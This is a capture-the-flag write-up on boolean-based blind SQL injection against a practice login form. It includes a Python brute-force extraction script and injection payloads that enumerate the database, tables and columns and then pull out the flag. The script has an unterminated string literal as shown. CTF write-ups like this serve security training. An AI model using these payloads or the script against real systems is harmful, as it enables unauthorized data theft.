We're given a login form with nothing else to go on. Testing the form, we get different errors based on what we enter `admin:password` = `The password you entered was not valid` `admin':password` = nothing `admin'-- :password` = `The password you entered was not valid` Looks like boolean based blind SQLi Using this script, we're able to pull the database name: ``` import requests import string url = 'http://c0ntrol.threatsims.com:8888/' headers = { "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" } found_chars = ' while True: for i in string.printable: data = { "username":f"admin' AND substring(database(),1,{len(found_chars) + 1})='{found_chars + i}'#", "password":"as", "submit":"" } print('Trying ' + found_chars + i) r = requests.post(url, data=data, headers=headers) if 'The password you entered was not valid.' in r.text: print('Hit ' + i) found_chars += i break ``` The database name is **ecorpdb** To get the table(s), we can use this injection in our script: ``` username":f"admin' AND (substr((select table_name from information_schema.tables where table_schema='ecorpdb' limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'# ``` Table name is **users** To get the columns, we can use this injection in our script: ``` "username":f"admin' AND (substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#", ``` columns are **flag**, **id** and **password** To get the data out of the columns, we can use this injection in our script: ``` "username":f"admin' AND (substr((select flag from users limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#", ``` Give us the flag `flag{g00d_ol_l0gin_sqli}` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #web #sqli #boolean-blind Related: